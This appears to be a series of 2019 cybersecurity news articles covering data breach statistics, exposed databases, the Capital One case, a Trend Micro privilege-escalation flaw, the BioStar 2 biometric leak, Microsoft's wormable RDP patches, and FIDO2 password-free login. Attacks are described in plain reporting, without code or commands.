The number of data breaches spiked dramatically in the first half of this year compared to previous years, according to a report from vulnerability intelligence company Risk Based Security. Its analysis found that breach numbers for the first six months of 2019 grew by 54% compared to the same period last year, while the number of exposed records grew 52%.
The growth in data breach volume bucks a trend that saw the number of breaches plateau in 2017 and 2018.
"The reason? Over 1,300 data leaks, mostly exposing email addresses and passwords, were documented in the first half of 2019," the report said. "Although these tend to be relatively small events, averaging fewer than 230 records exposed per incident, these leaks have contributed substantially to the number of access credentials freely available on the Internet."
The number of records exposed in 1H 2019 (4.19 billion) may be larger than in 2018 (2.74 billion), but historical record volumes are more erratic. The first half of 2017 saw six billion records exposed, the report said.
According to the report, eight breaches within the first half of this year accounted for 3.2 billion breached records, or 78.6% of the total. Three of the breaches were among the largest of all time.
Six of the top eight breaches stemmed from misconfigured databases or web applications: Verifications.io (982 million records), First American Financial (885 million), Cultura Colectiva (540 million), two unknown organizations in India and China (275 million and 202 million, respectively) and Justdial (100 million).
Web-based breaches like these are by far the most common in terms of exposed records, accounting for 79% of total breaches in the first half of the year.
Only two of the top eight – Dubsmash's 161 million record-breach and Canva's loss of 139 million records – were down to other hacking techniques.
The number of breaches doesn't tell the whole story, either. While the first half of this year yielded more breaches than ever before, the majority had a moderate to low severity score and exposed 10,000 records or fewer.
The type of data stolen also plays a part. Email addresses and passwords are still the primary records stolen, present in 70% and 65% of stolen data sets, respectively. These can be used for credential stuffing when shared across multiple sites, but they can also be changed, the report points out.
More critical data was less commonly stolen. Addresses, credit card and Social Security numbers were only stolen in 11% of attacks, with account numbers only showing up in 10%.
The European Central Bank (ECB) has been forced to shut down one of its websites following a cyber-attack which may have compromised customer data.
The bank said in a brief statement that hackers had compromised its Banks’ Integrated Reporting Dictionary (BIRD) website, which is hosted by an external third party.
It claimed that malware had been injected onto the server “to aid phishing activities.
“As a result, it was possible that the contact data (but not the passwords) of 481 subscribers to the BIRD newsletter may have been captured,” the statement continued.
“The affected information consists of the email addresses, names and position titles of the subscribers. The ECB is contacting people whose data may have been affected.”
The BIRD website is said to provide the banking industry with info designed to help produce statistical and supervisory reports.
The ECB said that as it is physically separate from any other external and internal ECB systems, no market-sensitive data has been affected by the incident.
The BIRD website has been closed until further notice and the European Data Protection Supervisor informed about the breach.
This isn’t the first time the ECB has been hit by hackers. In 2014, attackers managed to compromise a database containing website form data – stealing 20,000 email addresses which they then tried to hold to ransom.
The financial sector has always been a major target for hackers.
It has seen a 67% increase in security breaches over the past five years, with the average cost of cybercrime for financial institutions jumping $1.4m over the past year to reach $13m, according to an Accenture report from earlier this year.
A leading open source project has come under fire for issuing misleading security advisories which may have put customers of its software at unnecessary risk.
Security vendor Synopsys analyzed 115 separate releases for popular web application framework Apache Struts and matched them up against the relevant advisories from the open source project.
In total, 24 of the 57 Apache Struts security advisories – nearly half – made mistakes when listing the versions of the framework that were impacted by vulnerabilities.
In fact, 61 additional versions of Apache Struts were impacted by at least one previously disclosed vulnerability, potentially exposing users to attack.
“While our findings included the identification of versions that were falsely reported as impacted in the original disclosure, the real risk for consumers of a component is when a vulnerable version is missed in the original assessment,” Synopsys argued.
“Given that development teams often cache ‘known good’ versions of components in an effort to ensure error-free compilation, under-reporting of impacted versions can have a lasting impact on overall product security.”
On the plus side, the Apache Software Foundation and Apache Struts team were praised for their “diligence” in collaborating with Synopsys on fixing the mistakes. An updated Apache Struts Security Advisories page was published earlier this week.
Apache Struts will be known to many as the web app framework which Equifax failed to patch back in 2017, leading to a major breach of personal and financial information on more than half of all Americans and millions of UK consumers.
That incident has already cost the credit agency in excess of $1bn, as well as the jobs of the CEO and other senior executives.
Formjacking accounted for 71% of all web-related data breaches in 2018 as hackers looked to steal customers’ financial information in large quantities, according to F5 Labs.
The security vendor’s Application Report 2019 is compiled from analysis of 760 breaches and revealed that attacks like those featuring Magecart digital skimmers are on the rise.
Already this year, there have been 83 reported attacks on web payment forms, compromising over 1.3 million payment cards, the firm claimed.
The transport industry was the biggest victim of formjacking attacks, accounting for 60% of all credit card-related theft during the reporting period, followed by retail (49%), business services (14%) and manufacturing (11%).
The report also revealed that 11% of newly discovered exploits in 2018 were part of a formjacking attack chain, including remote code execution (5.4%), arbitrary file inclusion (3.8%) and remote CMD execution (1.1%).
David Warburton, senior threat evangelist at F5 Networks, argued that formjacking attacks have “exploded in popularity” over the past two years.
“Web applications are increasingly outsourcing critical components of their code, such as shopping carts and card payment systems, to third parties. Web developers are making use of imported code libraries or, in some cases, linking their app directly to third party scripts hosted on the web,” he explained.
“As a result, businesses find themselves in a vulnerable position as their code is compiled from dozens of different sources – almost all of which are beyond the boundary of normal enterprise security controls. Since many web sites make use of the same third-party resources, attackers know that they just need to compromise a single component to skim data from a huge pool of potential victims.”
“The injection landscape is transforming along with our behavior,” said Warburton.
“Adequately detecting and mitigating injection flaws now depends on adapting assessments and controls – not just fixing code. The more code we hand over to third parties, the less visibility and less control we have over it.”
Online election interference has become such a concern that one company has now launched a product to help protect against it. ZeroFOX has announced a security suite to safeguard political candidates and campaigns from online threats.
The ZeroFOX Election Protection Solution analyzes data across social media and other online sources, including the deep web (the closed surface websites that aren't publicly searchable) and the dark web (usually .onion sites accessed via Tor). It searches for fake accounts, phishing attacks and threats of physical harm, along with malware links and malicious domains and websites.
ZeroFOX has a situational awareness team that helps to address fake or online content and take it down from campaign-owned digital platforms in real time. It will also work with social media networks to remove content that violates the networks' terms of service (ToS), says ZeroFOX CTO Mike Price.
"ZeroFOX bridges customers to the social networks, requesting that ToS-violating content be taken down where appropriate," he says. "The social networks are the entities that ultimately decide how to respond to any given piece of content. If they agree that a piece of content violates ToS and should be taken down, then it is generally quickly taken down. "
Users of the product first determine which candidates and website to protect, and then configure rules from a library of pre-built policies to watch for spoof accounts, takeovers and inappropriate content, including online threats.
ZeroFOX also claims to be the first offering a deepfake detection solution as part of the product. That technology, announced at the Black Hat conference last week, uses artificial intelligence to look for fake videos. The company also donated its AI deepfake detection toolkit, Deepstar, to the open source community to help others train AI data sets that can help spot fake videos.
Election interference using digital platforms continues to be a concern in various regions. Last month, a Senate Intelligence Committee report found that Russia had probably infiltrated voting infrastructures in all 50 states over the last few years. Another report found San Mateo County's election systems vulnerable to hijacking and propagating disinformation. In May, a report from SecurityScorecard found political parties in several countries badly failing at protecting their election systems.
In Europe, the EU issued a statement earlier this year calling out election disinformation campaigns by Russia, China, North Korea, and Iran.
Companies using decoy systems to lure hackers away from legitimate targets spot hackers in their networks much more quickly than those who don't, according to a survey released today. The study, conducted by analyst company Enterprise Management Associates (EMA) and commissioned by deception technology vendor Attivo Networks, found that companies using deception techniques detected hackers on the network almost two months sooner than those that didn't use the techniques.
Deception technology attempts to throw attackers off the trail by offering up decoy assets for them to attack. Modern solutions include things like fake credentials, browser histories and registry entries, which lure attackers to decoy systems. They are typically invisible to legitimate network users but accessible via dual-use tools like PowerShell, which attackers often use to traverse networks.
EMA surveyed 208 respondents, ranging from IT managers through to CISOs and line-of-business managers, across various sectors. Roughly half of the organizations (55%) used deception technology. Of those that did, around half used commercial solutions, while 18% relied on traditional honeypots or honey nets and 30% used homegrown or open source solutions.
One of the most significant differences in the effects of deception technology was on dwell time (the length of time that attackers lurk in the company network). On average, respondents who had discovered attackers in their infrastructure reported a 31.9-day dwell time. Users of deception technology who considered themselves highly familiar with it reported a dwell time of 5.5 days in their networks, compared with nonusers, who said that companies faced a 60.9-day dwell time.
Those that used deception technology most often created decoy IT infrastructure systems like LDAP servers and IT network devices like switches and routers. Almost one in five (19%) of respondents emulated these systems, with enterprise applications like CRM and ERP coming a close second at 15%. They most often deployed decoy technology in cloud-hosted systems and applications, followed by their own applications and servers.
The use of deception technology also played a part in how companies discovered breaches. On average, 26% of respondents learned of them from outsiders. Fewer than one in five (18%) companies using deception technology found out about it this way, compared to 36% of the companies that didn't use it.
Clickjacking is alive and well, hijacking browsers that visit hundreds of popular websites, according to research released this week. A paper published by researchers at the Chinese University of Hong Kong, Microsoft Research, Seoul National University, Purdue University, and Pennsylvania State University, found that many of the world's most popular sites are still fooling visitors into following deceptive links to unexpected destinations.
Clickjacking is a well-established technique in which third-party scripts or browser extensions can hijack users' clicks, redirecting them to alternate locations. Online crooks can use them to download malware to a victim's computer or to commit advertising fraud, redirecting clicks to online ads and earning commission.
Advertising click fraudsters used to use online bots to automatically click online ads at scale, but ad networks got wise to this practice. Instead, attackers have recently begun redirecting legitimate page clicks from real users, the paper says.
Observer found 613 websites using 437 third-party scripts that intercepted user clicks. That may not sound like many, but the websites collectively received 43 million daily visits, according to the paper.
These scripts tricked users into following links by disguising them as legitimate site content. Observer spotted 3,251 clickjacking destination URLs, with 36% related to online advertising.
Attackers used three devious techniques to intercept user clicks. One involved intercepting hyperlinks by tampering with tags or embedding hyperlinks in huge page elements that covered at least 75% of the browser window. The second used event handlers such as navigation event listeners, which would open the malicious URL when the user clicked anything on a page.
The final technique was visual deception, which either mimicked legitimate page content such as Facebook Like buttons or put a transparent overlay element over legitimate content. Attackers could use either approach to send hijack a user's click on a button or other page element.
Security researchers have found a stealthy new cryptocurrency mining malware variant which was used as part of an attack that infected almost an entire organization.
After being notified of unstable applications and network slowdowns in a client organization, security firm Varonis decided to investigate further.
“Almost every server and workstation was infected with malware. Most were generic variants of cryptominers. Some were password dumping tools, some were hidden PHP shells, and some had been present for several years,” it explained in a blog post.
“Out of all the cryptominer samples that we found, one stood out. We named it ‘Norman’.”
Norman is a high-performance miner of Monero currency that differed from many of the other samples discovered in its sophisticated attempts to stay hidden.
Unusually, it is compiled with Nullsoft Scriptable Install System (NSIS), an open source system usually employed to create Windows installers.
The injection payload is designed to execute a cryptocurrency miner and stay hidden, said Varonis.
It avoids detection by terminating the miner function when the Task Manager is opened by a curious user. Once closed, it will re-inject the miner and start again.
The miner itself is XMRig, obfuscated in the malware by UPX and injected into either Notepad or Explorer depending on the execution path.
Varonis believes the cryptocurrency mining malware it discovered could be linked to a PHP shell it found in the victim organization continually connecting to a command-and-control (C2) server. Like Norman, the PHP shell used DuckDNS for C2 comms.
“None of the malware samples had any lateral movement capabilities, though they had spread across different devices and network segments,” the firm explained. “Though the threat actor could have infected each host individually (perhaps via the same vector used in the initial infection), it would have been more efficient to use the PHP-Shell to move laterally and infect other devices in the victim’s network.”
However, it also claimed there were no coding similarities between the two, or communications capabilities between the crypto-mining malware and PHP shell.
The malware authors could be French speaking, given the language was present in some of the code.
Varonis urged firms worried about crypto-jacking to: keep operating systems up-to-date; monitor network traffic and web proxies; maintain anti-virus on endpoints; keep an eye on DNS and CPU activity; and have an incident response plan ready and tested.
While around a third of 18-year-olds have been accepted for a university place through UCAS, new opportunities have been opened for cybersecurity experience.
Although statistics from UCAS show that 28.5% of the 18-year-old population have been accepted through UCAS, with 33,630 international students from outside the EU and 26,440 students from within the EU accepted, there is an overall 1% decrease in the number of people placed on undergraduate courses in the UK so far.
However, options exist for those students looking for a career path into cybersecurity, which “are a really good alternative to the stress of Clearing” according to CREST president Ian Glover.
He told Infosecurity that cybersecurity higher apprenticeships are not only an alternative route for those who do not get the choice of first or second university course, but they provide an excellent way to get a degree, along with work experience and without having to take on large student loans.
“Programs like the government’s cyber apprenticeships that provide structured learning, with assessed work activities, result in qualifications and experience that allow young people to enter and progress in the cybersecurity profession,” he said. “It also opens up a career in cybersecurity to a far wider and more diverse group of young people.”
Also offering opportunities today is Immersive Labs, who is offering free access to its cyber-skills development platform. Backed by Goldman Sachs and developed by an ex GCHQ trainer, the technology will give students access to a purpose-built set of ‘labs’ which drop the user into entry-level cybersecurity challenges.
Each lab is run through the browser and drops the student into a simulated incident which appears as it would to a security team in a company, and encourages them to teach themselves the skills to progress.
James Hadley, Immersive Labs founder and CEO, said: “The world is crying out for cybersecurity talent, yet the majority of ways we are trying to train these people are broken. While university can be a valuable path for some, its rigid conditions can also be exclusive.
“Not everyone wants to sit in a classroom learning passively. My experience at GCHQ taught me the best cyber-talent is creative and curious; they learn by breaking things and thinking on their feet. Unfortunately, this jars with traditional teaching methods, which I fear is leading to an unnecessary talent drain. We have opened up our platform to give these individuals an opportunity to learn.”
The offer remains open for today and for a week after to those who can prove they haven’t got into their first choice of university via a sign-up form on the website. The labs will stay available for six months and will be periodically updated with new content.
Hackers claim to have stolen 700,000 customer records from Choice Hotels thanks to an exposed MongoDB instance, it has emerged.
The US-based chain, which runs franchised outlets in over 40 countries worldwide, is now being held to ransom after the hackers left a note demanding 0.4 Bitcoin (around $3800) in payment for the data, which they claimed to have copied.
Security researcher Bob Diachenko worked with security firm Comparitech to discover the database, which was left completely exposed online. However, hackers had already got there. It was only left online for four days without password protection before attackers found the account.
Although the database held 5.6 million records in total, Choice Hotels told Comparitech that most of these related to test data. Of the 700,000 genuine records stolen, names, email addresses and phone numbers of customers are among the details taken.
The server itself is said to have been owned and managed by a third party who was working with the hotel chain on a new “tool.”
“We have discussed this matter with the vendor and will not be working with them in the future,” Choice Hotels told Comparitech in an email.
“We are evaluating other vendor relationships and working to put additional controls in place to prevent any future occurrences of this nature. We are also establishing a Responsible Disclosure Program, and we welcome Mr Diachenko’s assistance in helping us identify any gaps.”
Diachenko believed the ransom note was left by an automated script set up specifically to target exposed MongoDB databases, although it didn’t succeed in wiping the data.
This is only the latest of many similar incidents involving unsecured MongoDB instances.
This year alone, hundreds of millions of individuals have had their personal data exposed, including 200 million Chinese CVs, 12.5 million Indian mothers, and 808 million records from an email validation firm.
Unsurprisingly, hackers are getting wise to these misconfigurations: earlier this month it was revealed that attackers stole 2.1 million records from a Mexican bookstore, demanding a ransom.
KnowBe4 security awareness advocate, Javvad Malik, argued that the Choice Hotels incident is yet another example of user error.
“While Choice Hotels may be correct in that the data was hosted by a third party and none of their servers were compromised, it does not change the fact that it was their customer data which was breached,” he added. “It has an obligation to ensure the security of its customer data whether its kept by themselves, or handed over to a third party.”
The woman allegedly responsible for the massive breach of customer data at Capital One stole data from 30 other organizations, according to new information from prosecutors.
In a new court filing, they alleged that Paige Thompson stole terabytes of information from enterprises, educational institutions and other organizations, although she claims not to have sold or distributed any of it to others.
The information is being revealed as part of efforts by prosecutors to persuade the judge to deny bail.
It alleges that Thompson has a history of threatening behavior, including threats to kill others and herself. She is also said to have harassed a couple for seven years, forcing them to obtain a protection order.
Investigators found the new information on data breaches on servers in Thompson’s bedroom.
“That data varies significantly in both type and amount. For example, much of the data appears not to be data containing personal identifying information,” the court filing explained.
“At this point, however, the government is continuing to work to identify specific entities from which data was stolen, as well as the type of data stolen from each entity. The government expects to add an additional charge against Thompson based upon each such theft of data, as the victims are identified and notified.”
It’s claimed that the Capital One breach affected over 100 million American and Canadian customers, including consumers and small businesses.
The trove included 140,000 Social Security numbers, 80,000 linked bank account numbers and one million Canadian Social Insurance numbers.
Although Thompson most recently held a position as software engineer with Amazon Web Services, the cloud provider reportedly said that the breach of its client Capital One was not the result of any insider knowledge. It is said to have been made possible by a misconfigured web application run by the bank on AWS infrastructure.
A detention hearing at a federal court in Seattle is set for August 22.
Anti-malware company Trend Micro has patched a flaw in its password manager that could have enabled an attacker to run their own code on a user's computer with the highest possible access privileges.
Available for the iOS, Android, Windows and Mac platforms, Trend Micro Password Manager stores login credentials, features one-click login and form-filling capabilities and synchronizes with the cloud so that people can use it across different devices. It is available as a free service for up to five passwords. Users pay to store more credentials. They can buy the product on its own or as an optional part of Trend Micro's Premium Security and Maximum Security solutions.
SafeBreach found an issue with pwmSvc.exe, a central control service that runs with privileged user account status. If compromised, this could enable an attacker to escalate privileges to the system level. Because this software is signed by Trend Micro, compromising it would allow an attacker to bypass its application white list. It could also be used as a persistent attack mechanism because it automatically starts when the computer boots, SafeBreach said in its analysis.
The researchers noticed that the program tried to load a missing DLL file from the default Python directory, which can be included in the PATH environment variable (PATH is a variable that tells the computer in which directories to find executable programs).
The program relied on the PATH variable when loading the DLL instead of specifying an absolute path. It also didn't check for a digital certificate when loading DLL files.
SafeBreach researchers were able to compromise the system by adding the Python directory to the PATHvariable and then using it to store an unsigned DLL file. This enabled them to piggyback their own code on Trend Micro's program, which would run it for them with elevated privileges.
An attacker could use this technique to compromise a system, they warned. "The service provides him with the ability to operate as NT AUTHORITYSYSTEM which is the most powerful user in Windows, so he can access almost every file and process which belongs to the user on the computer," they wrote.
SafeBreach reported the flaw to Trend Micro on July 23, and the vendor patched it and released a new version on July 31. It also published a security bulletin of its own today addressing the issue.
Cloud-based back-end services are letting mobile app developers down, according to research announced this week. Even when app developers are careful about their own code, the online services that they use introduce vulnerabilities on a regular basis.
The research, from the Georgia Institute of Technology and The Ohio State University, studied the top 5,000 apps on the Google Play Store. It found that between them, they were using 6,869 server networks across the world.
They scanned cloud-based back-ends and found 1,638 vulnerabilities, of which 655 were zero-days not listed in the National Vulnerability Database. These included SQL injection, cross-site scripting and external XML entity attacks. Some of the apps affected had over 50 million installations, according to their paper.
Mobile apps access back-end services using third-party software-development kits (SDKs) and APIs. Developers use some of them explicitly, but many others are hidden in imported third-party libraries. The apps that use these services communicate with them invisibly. Users don't know what the services are doing or exactly which servers their phones are talking with when their apps fetch content and advertisements.
"Due to the inherent complexity of cloud-based backends, deploying and maintaining them securely is challenging. Consequently, mobile app developers often disregard prudent security practices when choosing cloud infrastructure, building, or renting these backends," the researchers said.
This opens up the apps to additional vulnerabilities that could compromise locally running code or leak user data, they added, citing the compromise of the British Airways website, which allowed attackers to steal data from the app.
The researchers scanned the apps with a tool called SkyWalker, which they will soon make available for app developers to audit the cloud-based tools that they are building into their apps.
They will present their findings at the USENIX Security Symposium in Santa Clara, California, which runs August 14–16, 2019.
A biometric building access system used by thousands of companies around the world has exposed 23 gigabytes of data, representing over 27.8 million records, researchers revealed today. The BioStar 2 product, used by such organizations as the UK Metropolitan Police, made information, including fingerprints and facial recognition images, publicly available.
Researchers from VPN advice company vpnMentor say they uncovered the data, exposed in the BioStar 2 web-based security platform. It stores biometric data used to access physical facilities at thousands of sites around the world. Customers use it to access secure areas of buildings and to log employees movements for time and attendance purposes.
BioStar 2 is also integrated into third-party systems such as Nedap's AEOS access control system, which is used by over 5,700 organizations in 83 countries. The UK Metropolitan Police is among them.
Exposed data included not just unencrypted employee usernames and passwords but also over a million fingerprint records and facial recognition images. The researchers could see records of employee movements throughout physical facilities, along with their start dates and security clearance levels, their home address and emails.
vpnMentor discovered the exposed data mostly unencrypted in an Elasticsearch database. The team could access it via a browser and could manipulate the URL to extract the data, they said in a report published today.
Affected companies include home decor and DIY supplier Tile Mountain in the UK and Power World Gyms, a gym franchise in India and Sri Lanka, which stored over 113,000 user records and fingerprints in the database.
Suprema, the company that makes BioStar 2, was supremely uncooperative, according to vpnMentor, which tried several times to contact the company by email. "Eventually, we decided to reach out to BioStar 2’s offices by phone. Again, the company was largely unresponsive," said vpnMentor. "Upon speaking to a member of their German team, we received a mumbled reply that 'we don’t speak to vpnMentor', before the phone was suddenly hung up."
Suprema didn't respond to queries from Infosecurity Magazine either. However, the company eventually fixed the problem yesterday, eight days after vpnMentor first contacted it.
vpnMentor warned that cyber-criminals could use the information to mount phishing attacks or sell it on the dark web. They could also use it to gain physical access to thousands of facilities around the world.
"A hacked building’s entire security infrastructure becomes useless. Anybody with this data will have free movement to go anywhere they choose, undetected," they said.
BioStar 2 users should change their dashboard passwords immediately and notify employees to change their personal passwords, said the researchers. However, the exposure of a centralized biometric database highlights a deeper problem, warned Charity Wright, cyber-threat intelligence analyst and researcher at threat protection company IntSights Cyber Intelligence.
"Suprema is really lucky that security researchers discovered this and disclosed it ethically. If they determine that hackers have accessed these open servers, the damage will be catastrophic," she said. "Unlike credentials, biometrics can be stolen and used to hack people's 2FA. These are plain-text passwords and real fingerprints that can be used to mimic the victims' login information, and we are talking about over 1.5 million locations where this technology is used."
Microsoft has patched 93 unique CVEs this month, and although there are no zero-days or publicly disclosed flaws, there’s plenty to keep sysadmins busy, according to experts.
Top of the list are two wormable RDP flaws CVE-2019-1181/1182) similar to the Bluekeep bug discovered earlier this year, which require urgent patching as an infection could spread without user interaction.
Elsewhere it’s a fairly light patch load by recent standards: there are 31 critical vulnerabilities and 65 rated as important.
“On the critical list are several Remote Code Execution (RCE) vulnerabilities including those that affect Hyper-V and Remote Desktop Services, services that are often exposed publicly. There are also RCE vulnerabilities in Outlook and Word where a maliciously crafted document or email could allow an attacker to execute their code,” explained Trustwave.
“Luckily the Outlook vulnerability can't be triggered by the simply using the Preview pane. A similar RCE affects .LNK or 'shortcuts' files, where an attacker could craft a malicious shortcut and would only need to get their target or victim to click on it to execute their code. There is also an RCE vulnerability in both DHCP servers and clients that could be triggered with a malicious DHCP lease request or response.”
“This tampering vulnerability has a CVSS score of 9.3. It requires specialised hardware to exploit but can allow wireless access and disruption within Bluetooth range of the device being attacked,” he explained. “Microsoft provided an update to address the issue, but the new functionality is disabled by default. You must enable the functionality by setting a flag in the registry.”
Elsewhere, Adobe released eight new updates including critical bulletins for Creative Cloud and Experience Manager and fixes for Acrobat and Acrobat Reader flaws, as well as a non-security update for Flash.
British Airways has come under fire from the security community again, this time after a vulnerability in its e-ticketing system was found to be exposing passenger’s personal information (PII).
Security firm Wandera claimed in a blog post yesterday that the airline was sending out unencrypted check-in links to customers which contained booking reference and surname in the URL itself.
“Therefore, someone snooping on the same public Wi-Fi network can easily intercept the link request, which includes the booking reference and surname and use these details to gain access to the passenger’s online itinerary in order to steal even more information or manipulate the booking information,” the firm explained.
With access to a customer’s account, hackers could then access further identity info including full name, itinerary, email address, phone number and much more – all valuable for use in potential follow-on phishing attacks and identity fraud.
Back in February, Wandera found the same vulnerability in check-in links sent by Southwest, KLM, Air France, Jetstar, Thomas Cook, Vueling, Air Europa and Transavia.
The firm recommended airlines use one-time tokens for direct links within emails and require explicit user authentication for all steps where PII is accessible and editable.
The news comes as BA is still reeling from a proposed £183m GDPR fine following security failings that allowed Magecart attackers to harvest customer details from its website.
Cesar Cerrudo, CTO at pen testers IOActive, argued that the focus for developers is too often on usability, performance and scalability rather than security.
“What is forgotten is just how sensitive the data being stored is,” he added.
“Yet while it is common practice for airlines to use third-party penetration testing for their hardware and critical flight services, they often test their online services and applications in-house using teams that are often under pressure from IT to meet strict time deadlines; meaning things slip through the gaps.”
Israel Barak, CISO at Cybereason, praised BA for acknowledging the incident and promising to fix it.
“This is hardly a knock-out punch for the airlines. For the consumer flying with British Airways, or with other carriers, they should be working under the assumption that their personal information has been compromised many times over,” he added.
“As an industry, until we can start making cybercrime unprofitable for adversaries, they will continue to hold the cards that will yield potentially massive pay-outs.”
The UK’s financial regulator has agreed to give the country’s payments and e-commerce providers more time to comply with new user authentication rules mandated by PSD2.
The Financial Conduct Authority (FCA) said yesterday that it would provide card issuers, payments firm and online retailers with an 18-month timeline to implement the Strong Customer Authentication (SCA) checks.
This is in line with the opinion of the European Banking Authority (EBA), which recently admitted that more time was needed to implement SCA given its complexity and a lack of preparedness in the market.
Originally set for a September 14 deadline, SCA will force any firms accepting payments online to ensure they apply two-factor authentication checks on their customers. In many cases, this will come in the form of the popular 3-D Secure option.
However, exceptions are made for low value payments (under €30), recurring payments such as subscriptions, customers who have whitelisted merchants they trust, and low-risk transactions. The latter requires a real-time risk assessment on each payment, and therefore advanced fraud screening tools.
The FCA will now not take action if any firms don’t meet the September 2019 deadline, as long as they can demonstrate “there is evidence that they have taken the necessary steps to comply with the plan.”
“The FCA has been working with the industry to put in place stronger means of ensuring that anyone seeking to make payments is not a fraudster,” explained Jonathan Davidson, executive director at the FCA.
“While these measures will reduce fraud, we want to make sure that they won’t cause material disruption to consumers themselves; so we have agreed a phased plan for their timely introduction.”
Jason Tooley, chief revenue officer at Veridium, said the delay was disappointing.
“Financial institutions and payment service providers have had nearly two years to prepare since the initial announcement, and there is no valid excuse for the delay in its enforcement apart from an unwillingness to participate,” he argued.
“Whilst it is true that consumers will see minor changes to their day-to-day spending, the additional layer of security on higher value payments will enable consumers to benefit from safer and more innovative electronic payment services. The impact on consumers must not be overlooked by the lengthy delay in enforcement; SCA will mean consumers are more confident when buying online – not act as a deterrent to sales as some have incorrectly suggested.”
Canada has launched a cybersecurity certification program to try and get small to midsize enterprises (SMEs) up to speed with a basic level of protection.
Launched at the University of New Brunswick's Canadian Institute for Cybersecurity by Minister of Finance Bill Morneau, CyberSecure Canada is a voluntary program that will help small organizations achieve a minimum required level of cybersecurity, according to the government.
The initiative requires Canadian SMEs to stick to a baseline set of cybersecurity controls developed by the Canadian Centre for Cyber Security. These controls include establishing an incident response plan, regularly patching operating systems and applications, using security software and securely configuring devices. Other measures in the list include using strong user authentication, offering employee awareness training and backing up and encrypting data.
Those passing the certification can display a mark showing that they have demonstrated compliance with the controls. Those businesses will also be listed on the program's website.
The Canadian government uses six certification bodies to check that companies have implemented the controls properly: Cyber Security Canada, Bell Canada, Bulletproof Solutions, Siemens, SourcetekIT, and WatSec. If businesses are using products and services from these companies that already meet the security controls, then some of the companies may certify them for free, the government's website says. Others may charge anywhere from a few hundred dollars to several thousand.
The certification lasts for two years, at which point businesses must go through the certification process again to continue using the certification mark.
The move follows growing concern over the cybersecurity preparedness of Canadian SMEs. In October, the Canadian Internet Registration Authority (CIRA) launched its 2018 Cybersecurity Security Survey, which gauged cybersecurity responses from 500 individuals at SMEs across Canada. It found that 40% of respondents had experienced a cyber-attack in the prior 12 months. Of the respondents, 88% were concerned with the prospect of future attacks, and 71% didn't have a formal software patching policy.
Google took another step toward ditching passwords as a login mechanism this week by announcing support for password-free access to some of its own services from Android phones. In a blog post on Monday, it demonstrated how users could access its cloud-based password manager using the new feature.
Users will be able to verify their identities by scanning their fingerprints on suitably equipped Android devices. While users have been able to access their phones using their fingerprints in the past, the new feature allows them to access back-end Google services as well.
The underlying technology uses standards underpinning FIDO2, which is a password-free log-in technology created by the FIDO Alliance. The underlying technologies, FIDO Client to Authenticator Protocol (CTAP) and W3C's WebAuthn, work together to authenticate the user on the phone and on the back-end site. The user creates a digital token by authenticating themselves on the phone, which CTAP then uses it to authenticate with the browser. WebAuthn then sends a digital token to the back-end service, logging the user in.
To use the service, the phone must be running Android 7 (Nougat) or later and set up with a personal Google account. The device must also be running a valid screen lock.
Google's FIDO2 support also lets users log into services using a hardware key, such as its own Titan Bluetooth-enabled device.
This latest announcement marks another step in Google's support of FIDO2. In February, it adopted the standard for Android apps.
Google rolled out the feature on Pixel devices on Monday and said that other Android devices would get the feature in the coming days.
Other companies have also made strides toward password-free access. In May, Microsoft achieved FIDO2 certification for Windows Hello, its biometric-capable login system included in Windows 10. This enables users to log into their Microsoft accounts using a hardware security key. The company also allowed Firefox users to log into their Microsoft accounts using FIDO2, with support for Google's Chrome to follow.
Just as exploits for Microsoft's BlueKeep bug make it into the wild, the company has announced another set of vulnerabilities in Windows that is equally dangerous – and this time, it also affects Windows 10 systems.
Microsoft announced the bugs, along with an associated set of patches, as part of its monthly Patch Tuesday release. The vulnerabilities lie in Remote Desktop Services (RDS), the Windows service that enables users to use a computer from a different location. RDS uses the remote desktop protocol (RDP), and an attacker can get full access to a system by sending a malicious RDP request to the victim's computer.
These new vulnerabilities can compromise a computer without the user doing anything, which means that they can spread quickly and autonomously. Attackers can use them to create worms that spread like wildfire online.
This makes the new vulnerabilities very similar to Bluekeep, the existing RDP-based worm that Microsoft announced and patched on May 14, 2019. However, that vulnerability (CVE-2019-0708) didn't affect Windows 10. These flaws (CVE-2019-1181, 1182, 1222 and 1226) do.
"At this time, we have no evidence that these vulnerabilities were known to any third party," said Microsoft in a blog post announcing the move, but it also sent a clear message: Patch now.
The announcement comes just a day after the Australian Signals Directorate's Cyber Security Centre warned that someone had published a way to exploit BlueKeep. It said: "A security researcher under the Twitter handle @zerosum0x0 has recently disclosed his Remote Desktop Protocol (RDP) exploit for the BlueKeep vulnerability to Metasploit. The disclosure, once made available to the public, is anticipated to increase the amount of RDP scanning actively, increasing the chances of attempted exploitation of unpatched systems."
The researcher in question made that submission at least two weeks ago:
RE: #BlueKeep @Metasploit. I performed a full knowledge transfer of my notes/code to the MSF core team. The release timeline is out of my hands and up to Rapid7 discretion. I've been too busy to work on it for over a month anyways; fresh eyes and polish. Thanks for understanding. pic.twitter.com/hXvpqbUYam— @zerosum0x0 July 31, 2019
Microsoft had also warned people repeatedly to patch those vulnerabilities, most recently on August 8, when it said that some 400,000 endpoints remained unprotected.
BlueKeep had been a difficult bug to exploit, although several security companies said that they had successfully produced proof of concept code internally. It isn't yet clear how difficult it will be to exploit the latest flaws or how quickly someone will produce and publish workable code.